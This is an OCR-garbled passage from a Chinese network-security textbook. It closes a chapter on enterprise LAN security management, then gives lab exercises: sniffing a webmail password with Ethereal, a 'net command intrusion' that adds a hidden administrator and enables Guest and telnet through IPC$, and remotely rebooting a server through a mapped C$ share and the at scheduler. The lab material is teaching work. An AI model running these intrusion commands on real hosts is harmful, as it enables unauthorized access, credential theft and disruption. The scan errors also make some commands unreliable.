了 热 备份 的 一 些 不 足 , 两 者 优势 互补 .相辅相成 ,因为 冷 备份 在 回避 风险 中 还 具有 便于 保管 
的 特殊 优点 。 


8.6.3 系统 安全 
系统 的 安全 主要 是 指 操作 系统 、 应 用 系统 的 安全 性 以 及 网 络 硬件 平台 的 可 靠 性 。 对 于 


大 型 企业 局 域 网 安 会 解 沁 方案 


第 


8 
章 


网 络 安 全 与 信息 保障 


操作 系统 的 安全 防范 可 以 采取 如 下 策略 。 

CD 对 操作 系统 进行 安全 配置 ,提高 系统 的 安全 性 ; 系统 内 部 调用 不 对 Internet AF; 
关键 性 信息 不 直接 公开 , 尽 可 能 采用 安全 性 高 的 操作 系统 。 

(2). 应 用 系统 在 开发 时 ,采用 规范 化 的 开发 过 程 , 尽 可 能 地 减少 应 用 系统 的 漏洞 。 

(3) 网 络 上 的 服务 器 和 网 络 设备 尽 可 能 不 采取 同一 家 的 产品 。 

(4) 通过 专业 的 安全 工具 (安全 检测 系统 ) 定 期 对 网 络 进行 安全 评估 。 


8.6.4 信息 安全 


在 这 个 企业 的 局 域 网 内 ,信息 主要 在 内 部 网 络 传递 ,因此 信息 被 窃听 、 自 改 的 可 能 性 很 
小 ,是 比较 安全 的 。 


8.6.5 应 用 安全 


在 应 用 安全 上 ,主要 考虑 通信 的 授权 ,传输 的 加 密 和 审计 记录 。 这 必须 加 强 登录 过 程 的 
认证 (特别 是 在 到 达 服 务 器 主机 之 前 的 认证 ), 确 保 用 户 的 合法 性 ; 其 次 ,应 该 严格 限制 登录 
者 的 操作 权限 ,将 其 完成 的 操作 限制 在 最 小 的 范围 内 。 另 外 ,在 加 强 主机 的 管理 上 ,除了 上 
面谈 的 访问 控制 和 系统 漏洞 检测 外 ,还 可 以 采用 访问 存 取 控制 ,对 权限 进行 分 割 和 管理 。 应 
用 安全 平台 要 加 强 资源 目录 管理 和 授权 管理 ,传输 加 密 、 审 计 记录 和 安全 管理 。 对 应 用 安 
全 ,主要 考虑 确定 不 同 服务 的 应 用 软件 并 紧密 注视 其 BUG; 对 扫描 软件 不 断 升级 。 


8.6.6 安全 管理 


安全 管理 的 主要 功能 是 指 对 安全 设备 的 管理 ; 监视 网 络 危 险情 况 , 对 危险 进行 隔离 ,并 
把 危险 控制 在 最 小 范围 内 ; 身份 认证 ,权限 设置 ; 对 资源 的 存 取 权限 的 管理 ; 对 资源 或 用 户 
动态 的 或 静态 的 审计 ; 对 违规 事件 ,自动 生成 报警 或 生成 事件 消息 ; 口令 管理 (如 操作 员 的 
口令 ), 对 无 权 操作 人 员 进 行 控制 ; 密 钥 管理 ,对 于 与 密 钥 相关 的 服务 器 ,应 对 其 设置 密 钥 生 
命 期 . 密 钥 备份 等 管理 功能 ; 宛 余 备份 ,为 增加 网 络 的 安全 系数 ,对 于 关键 的 服务 器 应 元 余 
备份 。 安 全 管理 应 该 从 管理 制度 和 管理 平台 技术 实现 两 个 方面 来 实现 ,安全 管理 产品 尽 可 
能 地 支持 统一 的 中 心 控制 平台 。 

为 了 保护 网 络 的 安全 性 ,除了 在 网 络 设计 上 增加 安全 服务 功能 ,完善 系统 的 安全 保密 措 
施 外 ,安全 管理 规范 也 是 网 络 安全 所 必需 的 。 安 全 管理 策略 一 方面 从 纯粹 的 管理 上 即 安全 
管理 规范 来 实现 , 另 一 方面 从 技术 上 建立 高 效 的 管理 平台 (包括 网 络 管理 和 安全 管理 )。 安 
全 管理 策略 主要 有 : 定义 完善 的 安全 管理 模型 ; 建立 长 远 的 并 且 可 实施 的 安全 策略 ; 彻底 
贯彻 规范 的 安全 防范 措施 ; 建立 恰当 的 安全 评估 尺度 ,并 且 进 行经 常 性 的 规则 审核 。 当 然 ， 
还 需要 建立 高 效 的 管理 平台 。 

1. 安全 管理 规范 

面 对 网 络 安全 的 脆弱 性 ,除了 在 网 络 设 计 上 增加 安全 服务 功能 ,完善 系统 的 安全 保密 措 
施 外 ,还 必须 花 大 力气 加 强 网 络 安 全 管理 规范 的 建立 ,因为 诸多 的 不 安全 因素 恰恰 反映 在 组 
织 管理 和 人 员 录 用 等 方面 ,而 这 又 是 计算 机 网 络 安全 所 必须 考虑 的 基本 问题 ,所 以 应 引起 各 
计算 机 网 络 应 用 部 门 领 导 的 重视 。 


2. 安全 管理 原则 

网 络 信息 系统 的 安全 管理 主要 基于 3 个 原则 。 

d) 多 人 负责 原则 : 每 一 项 与 安全 有 关 的 活动 ,都 必须 有 两 人 或 多 人 在 场 。 这 些 人 应 
是 系统 主管 领导 指派 的 ,他 们 忠诚 可 靠 ,能 胜任 此 项 工作 ; 他 们 应 该 签署 工作 情况 记录 以 证 
明 安全 工作 已 得 到 保障 。 具 体 的 活动 有 : 访问 控制 使 用 证 件 的 发 放 与 回收 ; 信息 处 理 系统 
使 用 的 媒介 发 放 与 回收 ; 处 理 保密 信息 ; 硬件 和 软件 的 维护 ; 系统 软件 的 设计 、 实 现 和 修 
改 ; 重要 程序 和 数据 的 删除 和 销毁 等 。 

(2) 任期 有 限 原则 : 一 般 地 讲 , 任 何人 最 好 不 要 长 期 担任 与 安全 有 关 的 职务 ,以 免 使 他 
认为 这 个 职务 是 专 有 的 或 永久 性 的 。 为 遵循 任期 有 限 原则 ,工作 人 员 应 不 定期 地 循环 任职 ， 
强制 实行 休假 制度 ,并 规定 对 工作 人 员 进 行 轮流 培训 ,以 使 任期 有 限制 度 切 实 可 行 。 

G) 职责 分 离 原则 : 在 信息 处 理 系统 工 作 的 人 员 不 要 打听 、 了 解 或 参与 职责 以 外 的 任 
何 与 安全 有 关 的 事情 ,除非 系统 主管 领导 批准 。 出 于 对 安全 的 考虑 ,下 面 每 组 内 的 两 项 信息 
处 理工 作 应 当 分 开 。 

D 计算 机 操作 与 计算 机 编程 ; 

@ 机 密 资料 的 接收 和 传送 ; 

© 安全 管理 和 系统 管理 ; 

@ 应 用 程序 和 系统 程序 的 编制 ; 

© 访问 证 件 的 管理 与 其 他 工作 ; 

© 计算 机 操作 与 信息 处 理 系统 使 用 媒介 的 保管 。 

3. 安全 管理 的 实现 

信息 系统 的 安全 管理 部 门 应 根据 管理 原则 和 该 系统 处 理 数 据 的 保密 性 ,制定 相应 的 管 
理 制 度 或 采用 相应 的 规范 。 具 体 工作 如 下 。 

Q) 根据 工作 的 重要 程度 ,确定 该 系统 的 安全 等 级 。 

(2) 根据 确定 的 安全 等 级 ,确定 安全 管理 的 范围 。 

G) 制订 相应 的 机 房 出 入 管理 制度 。 对 于 安全 等 级 要 求 较 高 的 系统 ,要 实行 分 区 控制 ， 
限制 工作 人 员 出 入 与 己 无 关 的 区 域 。 出 入 管理 可 采用 证 件 识 别 或 安装 自动 识别 登记 系统 ， 
采用 磁卡 .身份 卡 等 手段 ,对 人 员 进 行 识别 .登记 管理 。 

(4) 制订 严格 的 操作 规程 。 操 作 规 程 要 根据 职责 分 离 和 多 人 负责 的 原则 ,各 负 其 责 ,不 
能 超越 自己 的 管辖 范围 。 

(5) 制订 完备 的 系统 维护 制度 。 

(6) 对 系统 进行 维护 时 ,应 采取 数据 保护 措施 ,如 数据 备份 等 。 维 护 时 要 首先 经 主管 部 
门 批准 ,并 有 安全 管理 人 员 在 场 , 故 障 的 原因 ,维护 内 容 和 维护 前 后 的 情况 要 详细 记录 。 

(7) 制订 应 急 措 施 。 要 制订 系统 在 紧急 情况 下 ,如 何 尽快 恢复 的 应 急 措施 ,使 损失 减 至 
最 小 。 建 立 人 员 雇 佣 和 解聘 制度 ,对 工作 调动 和 离职 人 员 要 及 时 调整 响应 的 授权 。 


大 型 企业 局 域 网 安 会 解决 方 侨 


doo 


将 


第 9 章 验 


实验 一 ”使 用 Ethereal 检测 工作 在 混杂 模式 下 的 网 卡 


实验 目的 : 使 用 Ethereal 检测 网 络 环境 , 抓 包 , 嗅 探 并 分 析 扫 描 结果 。 
实验 环境 : Windows 2000 Server 并 且 在 局 域 网 环境 下 。 
实验 步骤 如 下 。 


任务 一 ”Ethereal 的 简单 应 用 
Ethereal 是 Linux 下 的 一 自 带 工 


TR AURRE] Windows 平台 下 需 安装 相应 补丁 。 
(1) 安装 : 找到 支持 Windows 的 版 本 和 补丁 安装 到 Windows 平 


s 平台 下 ,安装 过 程 与 普通 
安装 程序 相同 。 

单 击 “ 开 始 "按钮 ,在 弹出 的 “开始 ”菜单 中 执行 “程序 ”>Ethereal->Ethereal 命令 ,程序 
启动 如 图 9. 1 所 示 。 


A xu) 
B exc 


RRO , 


er 


Serve 


[s 


> &] Ethereal Web Site. 
注销 administrator(L)... 


D 

Q 

m an (B)... i C] Ethereal Program Directory 
e 

Aj sm 


» LIT 2000 


Er Jm Ba... 


NITTEITUN 


图 9.1 程序 启动 
打开 程序 界面 如 图 9. 2 所 示 。 
(2) 抓 包 实 例 : 选择 Capture>Start 选 
。 Interface: 选择 接口 ( 指 哪 块 网 卡 ) 。 
e limit each packet to; 是 否 限 制 包 大 小 。 
* Capture packets in promiscuous mode: 


* Filter: 包 过 滤 ( 过 滤 哪 些 包 ) 。 


先 项 ,进入 属性 设置 页 面 , 如 图 9. 3 所 示 。 


是 否 让 网 卡 工作 在 混杂 模式 上 。 


(9 The Ethereal Network Analyzer Ani xi 
File Edit Capture Display Tools Help 


|o -[rme|Sowce|Destmation |Protocat [mo | 


/| Reset] Apply|[ Ready to load or capture 


图 9.2 程序 界面 


@ Ethereal: Capture Options =la xd 


Capture 


Interface: {D-Link DFE-530TX PCI Fast Ethernet 2 J| 
| Limit each packet to Fe Ic bytes 


T- Capture packets in promiscuous mode 


F iter| [ 

Capture file(s; 

File. 

Use ring buffer Number of files [p k 


Rotate capture file every fi k second(s) 
Display options 


— Update list of packets in real time 


Automatic scrolling in live capture 


Capture limits. 
J Stop capture after 3 packet(s) captured 
Stop capture after I 3 kilobyte(s) captured 
Stop capture after f k second(s) 

Name resolution 
r Enable MAC name resolution 


|j Enable network name resolution 


r Enable transport name resolution 


OK Cancel 


图 9.3 属性 设置 


基本 抓 包 设置 已 具备 ,如 果 需 要 其 他 功能 可 以 设置 下 面 选项 。 
。 Capture file: 捕获 文件 。 
* Display options; 扩展 选项 。 


How 


网 络 安 会 与 信息 保障 


* Capture limits; 捕获 限定 。 
* Name resolution; 名 称 辨 别 。 


任务 二 数据 包 分 析 ( 如 ping 包 ) 


(1) 先 打开 嗅 探 器 ,开始 抓 包 如 以 上 步骤 , 单 击 OK 按钮 ,此 时 车 有 人 使 用 ping 命令 则 
会 被 抓获 该 数据 包 , 如 图 9.4 所 示 。 


@ 
File Edit Capture Display Tools Help 


Source Protocol | Info 
Ox886f MS NLE 


. 507422 0 : Broadcast Ox886f 
. 008239 H Broadcast Ox886f 


. 509071 0 : Broadcast Ox886f 
Bnoadesst Ox886f 


. 510719 0 : Broadcast OXSS6f 
.011524 02 : Broadcast Ox886f 


田 Frame 1 (1510 bytes on wire, 1510 byt 
田 Ethernet II, Src: 02:01:00:00:00:00, Dst: ff:ff:ff:ff:ff:ff 
Data (1496 bytes) 


图 9.4 抓获 的 ping 数据 包 


(2) 图 9.4 中 黑色 部 分 是 被 截获 的 ping 包 ( 四 去 四 回 ) 。 

分 析 ping & ,选中 其 中 一 个 ping 包 , 此 时 会 在 第 二 个 列表 框 中 显示 该 包 的 相关 信息 。 
数据 包 信息 ,如 图 9.5 所 示 。 

Se 息 。 

: 其 中 包括 数据 包 收 到 时 间 数据 包 传输 时 间 ` 结 构 数 等 。 

. uM d 其 中 包括 来 源 、 目 的 类 型 (IP) 等 。 

* Internet 协议 : 其 中 有 协议 类 型 (ICMP) ,来 源 地 址 目标 地 址 等 。 

。 Internet 控制 消息 请 求 协议 : ping 的 哪 一 方 请 求 , 哪 一 方 回应 。 

。 具体 数据 内 容 在 最 后 的 方 框 中 显示 (二 进 制 码 ) 。 


bytes captured. 
Arrival Time: May 25, 2004 11:45:57. 573055000 
Time delta from previous packet: 0.481075000 seconds 
Time relative to first packet: 2.999788000 seconds 
Frame Number: 


Eb Ethernet II, Src: 00:40:05:4 Ost; 00:00:18:db:có:df 


Destination: 00: 
Sourci 00:40:0' 
Type: IP (0x0800) 


db:cé:df (192.168.0.116) 
c (192.168.0.99) 


$2 


IB internet Protocol, Sre addr: 192.168.0.99 (192.168.0.99), Ost Addr: 192.168.0.116 (19 


wersion: 4 
Meader length: 20 bytes 
Golfferentiated services Field: 0x00 Cosce 0x00: Default; ECN: 0x00) 
Tota! Length: 60 
Identification: Ox8a6a (35434) 
S Flags: 0x00 
Fragment offset: 0 
Time to live: 64 
Protocol: TCMP (0x01) 
Header checksum; Ox6e2f (correct) 
Source: 192.168.0.99 (192.168.0.99) 
Destination: 192.168.0.116 (192.168.0.116) 


日 xzngerner Control Message Protocol 


Type: 8 (Echo (ping) request) 


Code: 0 
Checksum: Ox0fSc (correct) 
Xdencifier: 0x0200 月 


ac 而 
e 2f cO a8 00 63 cO a8 
3c 00 61 62 63 64 65 66 
6f 70 71 72 73 74 75 76 
68 的 


图 9.5 数据 包 信息 


任务 三 账户 和 密码 的 截获 


A) 打开 Ethereal 程序 界面 ,执行 Capture-~>Start 命令 ,选择 “混杂 模式 ? 选 框 , 单 击 OK 
按钮 , 单 击 Stop 按钮 停止 拦截 如 图 9.6 所 示 。 


Filo Edi Captum Display Tools 


-216721 202. 108.44. 135 .168.0.99 http > 2663 [SYM, ACK] Seq. 


5 

5.216755 192.168.0.99 202.108.44.135 TCP 2663 > http fack] Seq-1023!| 
5.217172 192.168.0.99 202.108.44.135 MTTP — POST /checkuser.]sp MTTP/1. 
5.217200 192.168.0.99 mte — Continuation 

5.269488 202.108.44.155 TCe http > 2663 [ack] Seq<3647( 
5.274812 202.108.44.135 » x TCP herp > 2663 [ack] Seq-3647 
5.296153 202.108.44.135 192.168.0.99 HTTP  WTTP/L.1 200 OK 

5.298339 202.108.44.135 192.168.0.99 MTTP — Continuation 

5.298413 192.168.0.99 202.108.44.135 TCP 2663 > http [acK] Seq<10231 
$.3$9773 202.108. 192.160.0.99 HTTP Continuation 

5,360831 202.108.44.135 192.168.0.99 HTTP — Continuation 

5.360927 192.168.0.99 202.108.44.135 TCP 2663 > hrrp [ack] Seqe1023!| 
5.388676 192.168.0.99 TCP 2663 > herp [FIN, ACK] seq. 
5.434059 202.108.44.155 TCP herp > 2663 [ack] Seq3647( 


OT dE 40 3c 00 40 0$ 44 37 ac 0à 08 4* 00 
9d 30 00 00 40 06 25 99 cO a8 00 63 ca 6c 
9a 67 00 50 3d 02 7d 1b 00 00 00 09 70 07 


9.6 抓获 的 包含 用 户 名 及 密码 的 数据 包 


网 络 安 全 与 信息 保障 


如 果 在 打开 Ethereal 时 ,有 人 正在 登录 某 信箱 ,或 传输 明文 代码 ,该 包 将 被 拦截 。 登 录 


邮箱 如 图 9.7 所 示 。 


d 网 易 通行 证 > 用 户 验证 - Microsoft Internet Explorer -loj xi 


XEO RÐ SEV KAA IAD EDD 
地 址 (D) |Æ) neto: f]reos. 163.com/checkuser. jsp -] era | 链接” 
PA- >- 0AA aL ”上 网 助 加 - c ÅEN 


arsa Jeya Jas (7)em 


$823 NETEasE 


www:163.com 


用 户 名 : baozong 
PE TELS 


EE 


HFR. ZMEBFEW: ( 用 手机 取 回 密码 ) 
加 果 您 是 VTF 用 户 请 点 击 这 里 梧 录 9 
" 用户 服务 完全 手册 
“* 如 果 族 还 没有 网 易 通 行 证 ， 计 直接 肿 请 
， 加 里 你 忘记 了 均码 ,不 要 查收 , os ER. aara z 


ik) 1 E Z7 
图 9.7 登录 邮箱 


(2) 选中 一 个 数据 包 (TCP 协议 ) , 右 击 ,在 弹出 的 快捷 菜单 中 选择 Follow TCP Stream 


选项 ,如 图 9. 8 所 示 。 


File Edit Capture Display Tools 


[ww ws 77 | Protocol - 


1 1_Eollow TCP Stream 


563 [svn] 
http » 2663 [SYN, 


9 216721 202. 108.44 133 

18 5.216755 192.168.0.99 202. E Decode As... 2663 > http [Ack] 
19 5.217172 192.168. 0. 99 202. 1 Display Filters... POST /checkuser. jsi 
20 5.217200 192.168. 0. 99 202. 1 Continuation 

21 5.269488 202.108.44.135 192.1 Mark Frame http > 2663 [ack] 
22 5.274812 202.108.44.135 192.1] 999 http > 2663 [ack] 
23 5,296153 202.108.44.135 192.1 ^| rrP ,1 200 ok 
24 5.298339 202.108.44.135 192.1 Prepare 2| continuation 

25 5.298413 192.168. 0. 99 202 oon 2663 > http [Ack] 
26 5.359773 202.108.44.135 192. E Colorize Display... Continuation 

27 5.360831 202.108.44.135 192.1 Print. Continuation 

28 5.360927 192.168. 0.99 202.15. 2663 > http [Ack] 
20 5.388676 192.168.0.99 202.1 Print Packet 2663 » http [FIN, 
30 5.434059 202.108.44.135 192.1 Show Packet In New Window | http > 2663 [ack] 


图 9.8 选中 数据 包 


显示 如 图 9. 9 所 示 的 数据 包 信息 。 

在 该 数据 流 中 可 以 看 到 用 户 的 名 称 ` 密 码 .时 间 等 相关 信息 (红色 为 用 户 信息 , 蓝 
站 反馈 信息 ) 。 

如 : username 一 baozong&paddword 一 22222222 


A 
E 
p 


s 
s 


“v 


upu 


色 为 网 


LETTUTICITTOMM———— EIE 


CONTENT= "text/html; charset«gb231275 


" PPP , 
aji) rom... | © ecoeno..| [i conne... 网 一 E oa 局 s e) LOOKS s 
图 9.9 数据 包 信息 


Ethereal 不 能 开启 时 间 太 长 ,如 果 拦 截 的 数据 包 过 多 ,超过 Ethereal 承受 能 力 ， 
密 


注 
Ethereal 将 会 死 掉 ; 在 网 络 上 传输 数据 一 定 要 


实验 二 ”net 命令 入 侵 实 例 


实验 名 称 : 使 用 net 命令 入 侵 实 例 

实验 目的 : 使 用 net 命令 入 侵 

实验 准备 : 在 Windows 2000 操作 系统 下 (包括 域 环境 ) ,两 人 进行 实验 ,相互 得 知 对 方 
的 IP 及 用 户 名 目前 机 器 的 IP 为 192. 168. 0. 220, 

假如 得 到 远程 主机 的 用 户 名 是 1, 密 码 是 1, 假 设 对 方 IP 为 192. 168. 0. 34, 

实验 步骤 : 

(1) 登录 主机 : net use\\192. 168. 0. 34\ipc $ 1 /user: 1, 如 图 9. 10 所 示 。 


NDO¥S\Systen32\cad. exe MEE | 


N192.168.8.34\ipc$ 1 /user:1 


图 9.10 登录 主机 


dh «o à 


H 


(2) 创建 一 个 用 户 , 由 于 SA 的 权限 相当 于 系统 的 超级 用 户 , 如 : 加 一 个 sysusers 的 用 
户 密码 为 111111。 输 入 命令 :“net user sysusers 111111 /add”, 如 图 9. 11 所 示 。 


三 本 


uindows 2000 [Ue 5 = 
有 1985-1998 micr 


susers 111111 /add 


图 9.11 创建 用 户 


(D 显示 命令 成 功 完成 后 , 襄 


administrators sysusers /add”, 如 图 9. 12 所 示 


党 可 以 把 它 加 入 administrators 组 ,输入 命令 :“net localgroup 


WINNT\System32\cmd.exe 


111111 /add 


/add 


图 9.12 加 入 administrators 组 


(4) 打开 对 方 的 Telnet 服务 命令 为 “net start telnet”, 如 图 9. 13 所 示 
(5) 激活 Guest 用 户 (Guest 是 NT 的 默认 用 户 ), 输 入 命令 “net user guest /active: yes". 
激活 Guest 用 户 , 如 图 9. 14 Bros. 
(6) 把 Gi WP WR pic CE. Guest 的 密码 改 为 111111) ,对 于 其 他 用 户 也 可 以 做 相 
同 的 T 只 要 有 权限 就 可 以 。 执 行 “net user guest 111111” 命 令 , 如 图 9. 15 所 示 


退出 "en EMA: "net use * /delete”, 如 图 9. 16 所 示 


:Documents_and Settings V: 
elnet 服务 z 


C:\Documents and Settings KÄPP m 


图 9. 


启动 Telnet 服务 


r guest /active:yes 


图 9.14 激活 Guest JH 


guest /active:yes 


guest iiiiii 


图 9.15 修改 Guest 的 


and Settings\hdmninistrator-KEN-COMPUTER>net use * /delete 
PER: 


\M192.168.8.189\ipc$ 


此 操作 ? (Y/N) [N]: 。 


图 9.16 退出 远程 连接 
(8) 用 net 命令 的 帮助 时 ,所 有 net 命令 接受 选项 /Yes 和 /No( 可 缩写 为 /Y 和 /N)。 
Y 对 命令 产生 的 任何 交互 提示 自动 回答 
示 确 认 是 和 否 根据 服务 器 结束 所 有 服务 ,net stop server /YY A zii E% 
务 ,如 图 9.17 所 示 


\WINNT\System32\cmd.ene - net stop server „lol x| 


.”,/N BUR" 28", [P] Ul. net stop server 38 7 
是" 并 关闭 服务 器 服 


‘Ynet stop 


Tii: BR LS 


192.16 8.18 
是 否 继续 此 操作 ? (Y/N cvi: 


图 9.17 关闭 服务 器 服务 


C9) 提供 网 络 命 yiri 表 及 帮助 主题 ,或 提供 指 % ne 


K net 下 面 的 “命令 参考 ?中 “命令 ?窗口 内 的 网 络 命令 和 帮助 主题 
所 示 。 


\WINNT\System32\cmd.exe E 


NET SEND 《name i * i /DOMAIN[:nanel ! /USERS? message 


图 9.18 网 络 命令 


NET HELP command ! MORE 用 于 逐 屏 显 示 帮 助 。 


IC:\>net help send 
此 命令 的 语法 是 : 


i æ | /DOMAINI[:namel ! /USERS) 


图 9.19 帮助 主题 


(10) Net Helpmsg 命令 提供 Windows NT 错误 信息 的 帮助 
5 


附 : 常用 的 net 命令 


JA BE. 。 可 用 网 络 命令 列 
,分 别 如 图 9. 18 和 图 9. 19 


命令 格式 为 ， 


iom 


Alerter 
Autonatic Updates 
COM* Event System 
Computer Browser 
lient 
buted File Systen 
Distributed Link Tracking Client 


Distributed Transaction Coordinator 
DNS Client 

Event Log 

IIS Admin Service 

IPSEC Policy figent 

License Logging Service 

Logical Disk Manager 

Messenger 

Network Connections 

NVIDIA Driver Helper Service 
Plug and Play 

Print Spooler 

Protected Storage 

Renote Access Connection Manager 
Remote Procedure Call <RPC) 
Remote Registry Service 
Removable Storage 


图 9.20 已 启动 服务 的 列表 


net start | service 


?net stop telnet 
有 启动 Telnet 服务 


] 9.21 启动 相关 服务 (1) 


相关 服务 包括 alerter, client. service for netware, clipbook server, content index, 
computer browser, dhcp client, directory replicator, eventlog, ftp publishing service, 


hypermedia object manager, logical disk manager, lpdsvc, media services management. 


messenger,Fax Service, Microsoft install server, net logon, netw dde, netw ork dde 


dsdm, nt lm security support provider, ole, plug and play, remote access connection 


manager,remote access isnsap service, remote acce 


server, remote procedure call (rpc) 
locator,remote procedure call (rpc) service, schedule, server, simple tcp/ip services, site 
server ldap service, smartcard resource manager, snmp, spooler, task scheduler, tcp/ip 
netbios helper,telephony service,tracking service, tracking (server) service, ups, Windows 
time service 和 workstation, 

下 面 服务 : file service for macintosh, gateway service for netware, microsoft dhcp 
service, print service for macintosh , windows internet name service 只 有 在 Windows 2000 
上 可 用 。 

net start alerter: 启动 “警报 器 ”服务 。“ 警 报 器 ”服务 发 送 警 告 消息 。 

: 启动 “剪贴 德 服务 器 ”服务 ,如 图 9. 22 所 示 。 


net start "clipbook server" 


C:\WINNT\system32\cmd.exe 二 | 口 | 之 | 


Dnet "computer brov: B 


c 
此 命令 


NET [ ACCOUNTS ! COMPUTER ! CONFIG ! CONTINUE ! FILE ! GROUP ! HELP i 
HELPMSG ! LOCALGROUP ! NAME ! PAUSE ! PRINT ! SEND ! SESSION ! 
SHARE ! START ! STATISTICS ! STOP ! TIME ! USE ! USER ! VIEW 1 


图 9.22 启动 相关 服务 (2) 


net start "computer browser": 启动 “计算 机 浏览 器 ? 朋 
Net start DHCP Client; 启动 ”DHCP 客户 ”服务 
后 才 可 用 ,如 图 9. 23 所 示 
Net start Eventlog 


x 


7 
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启动 “事件 日 志 ” 服 务 ,该 服务 将 事件 记录 在 本 地 计算 机 上 。 必 须 
在 使 用 事件 查看 器 查看 记录 的 事件 之 前 启动 该 服务 

net start messenger: 启动 “信使 "服务 。“ 信 使 "服务 允许 计算 机 接收 邮件 。 

net start "net logon": 启动 “网 络 登录 ”服务 。“ 网 络 登录 ”服务 验证 登录 请 求 并 控制 复 
制 用 户 账 户 数据 库 域 宽 。 两 个 词组 成 的 服务 名 ,例如 Net Logon, 必 须 两 边 加 引号 CO. iX 
服务 也 可 以 使 用 命令 net start netlogon 启动 。 

net start "network dde"; 启动 网络 DDE” 服 务 , 如 图 9. 24 所 示 

net start "nt lm security support ponon i Jas" NT LM 安全 支持 提供 程序 ”服务 。 

只 有 在 "NT LM 安全 支持 提供 程序 ”后 才 可 用 。 


dh «o sd 


C: YNet start DHCP Client 
请 求 的 服务 启动 


请 键入 NET HELPMSG 2182 以 获得 


入 NET HELPMSG 2185 以 获 


start" directory replicator" 
语 涛 是 


比 命 令 的 语法 是 


图 9.23 启动 相关 服务 (3) 


‘WINNT\system32\cmd.exe 


o 


. NET HELPMSG 2182 以 获得 更 多 的 


lc: Ynet start "net logon" 


请 求 的 服务 已 经 启动 。 


请 键入 NET HELPMSG 2182 以 获得 更 


图 9.24 启动 相关 服务 (4) 


net start ole; 启动 对象 链 接 和 艇 人 ”服务 

net start "remote access connection manager"; 启动 “远程 访问 链接 管理 器 服务。 该 
命令 只 有 在 安装 了 “远程 访问 服务 "后 才 可 用 。 

net start "remote procedure call (rpc) locator"; 启动 RPC 定 
5 J& Microsoft Windows 2000 的 RPC 名 称 服务 。 


立 器 服务 。“ 定 位 器 ” 服 


实验 三 ”通过 139 端口 远程 重新 启动 Windows 服务 器 


实验 名 称 : 通过 139 端口 远程 

实验 目的 : 通过 139 端口 远程 重新 启动 Windows 服务 器 。 

实验 准备 : 在 Windows 2000 系统 下 (包括 域 环 境 ) ,两 人 进行 实验 ,相互 得 知 对 方 的 IP 
及 用 户 名 密码。 目前 机 器 的 IP 为 192. 168. 0. 220, 

假如 得 到 远程 主机 的 用 户 名 是 administrator, 密 码 是 空 ,假设 对 方 IP 为 192. 168. 0. 99, 

如 果 服 务 器 的 139 端口 开 着 ,重新 启动 是 很 简单 的 

实验 步骤 : 

(1) 在 执行 操作 之 前 ,可 以 先 删除 目前 存在 的 连接 ,如 图 9. 25 所 示 


所 启动 Windows 服务 器 。 


WSASysten32Vcnd. exe E inix 


C:\Documents and Settings Nyueqingqi?,, 


图 9.25 删除 目前 存在 的 连接 


(2) 登录 主机 :“net use\\192. 168. 0. 99Nipc $ "*/user; administrator ”如 图 9. 26 所 示 。 


tings\yueqingqidnet use * /delete 


53192.168.8.99 i pcó 


and SettingsNyueqingqi?net use \\192.168.8.99\ipc$ 


[C:\Documents and SettingsNyueqingqi? 


图 9.26 登录 主机 


实验 


3 
Ñ 


H o 


[C:\Documents and Settings\yueqingqi> 


图 9.27 映射 


贮 理 器 ”可 以 看 到 新 加 的 H 盘 , 如 图 9. 28 所 示 


LD sug FEV 收藏 入) IAW 帮助 中 


rm 
文件 天 [uH 


TA 添加 /其 除 程序 有 可 移动 存 鳍 的 设备 


Q xe—rem 


DVD/CD-Kr 3EXDEP 


图 9.28 映射 结果 


(5) copy con h: \reboot. bat 


iisreset /reboot 

Ctrl+2 

在 对 方 的 C 盘 上 生成 了 一 个 能 重新 启动 计算 机 的 文件 ,如 图 9. 29 所 示 。 

(6) net time\\192. 168. 0. 136 (net time \Nip 看 看 对 方 及 计算 机 的 时 间 ) 

显示 : \\192. 168. 0. 136 的 当前 时 间 是 2009/9/01 下 午 08: 55 

命令 成 功 完成 ,如 图 9. 30 所 示 。 

(7) at\\192. 168.0. 136 9: 00 c; \reboot. bat (at \\xxx. xxx. xxx. xxx 重新 启动 的 时 
间 c: VXreboot. bat) 

观察 IP 地 址 为 192 . 168.0. 99 的 机 器 ,在 指定 的 时 间 , 机 器 会 自动 重新 启动 。 


Ic: Documents and 


Ic: Documents and 


Ic: Document 


and SettingsNyueqingqi?net use h: w192.168.8.99*c$ 


set /reboot 


i i 


Settings\yueqingqi>copy con h:wreboot.bat 


SettingsNyueqingqi?, 


图 9.29 生成 重新 启动 文件 


and SettingsNyueqingqi?net use h? 5192.168.0.99 c5 


[C:Documents and Settings*yueqingqi?copy con h:wreboot.bat 


i 


set /reboot 


rz 
己 复 制 个 文件 


C:\Documents and Setting 
hv92.168.0.99 的 当前 时 | 


yueqingqi?net time \\192-168.9.- 
2884/7720 FF 18:34 


[C:\Documents and Settings\yueqingqi> 


net start 
间 启 动 程序 。 


net start 


net start 
net start 


net start 


Net start 


Net start 


图 9.30 显示 当前 时 间 


schedule; 启动 “计划 ” 


server: 启动 “服务 器 ” 


spooler: 启动 “后 台 打 


服务 。“ 计 划 ” 服 务 使 计算 机 可 以 使 用 at 命令 在 指定 时 


服务 。“ 服 务 器 ”服务 使 计算 机 可 以 共享 网 络 上 的 资源 。 


印 程序 ” 


ups: 启动 “不 间断 电源 (UPS)” 服 务 


workstation; 启动 “ 工 


Schedule; 启动 “定时 


Telnet: 启动 Telnet 有 


E 站 ”服务 。“ 工 作 站 ”服务 使 计算 机 可 以 连接 并 使 用 网 


”服务 。 


务 ,打开 23 端口 ,有 的 情况 下 需 先 运行 NTLM. exe, 


om 


网 络 安 会 


418, E IR IE 


net start workstation; 打开 NET USE, 
net start lanmanserver; 打开 IPC 服务 。 


实验 四 ”使 用 tracert 命令 检测 路 由 和 拓扑 结构 信息 


实验 目的 : 通过 使 用 tracert 命令 获得 网 络 的 拓扑 结构 信息 。 
实验 步 
(1) 执行 “开始 ” 


图 9.31 所 示 。 


图 9.31 进入 命令 提示 符 状 态 


(2) 输入 以 下 命令 : tracert 192. 168. 0. x(x 为 合作 伙伴 的 座位 号 ) 3 
确认 W ,如 图 9. 32 E 示 。 


(3) 输入 tracert sohu. com, 按 Enter 


ms 192.168.0.1 
ns 61.149.112.1 
ms 61.148.4.93 
ms 282.108.47.17 
ms 202.108. 

ns 202.108. 


Reque: 


ERTELENEN) 


图 9. 32 显示 结果 


”命令 ,输入 cmd. 打开 命令 行 窗 口 ,进入 命令 提示 符 状 态 ,如 


客 可 
础 ， 


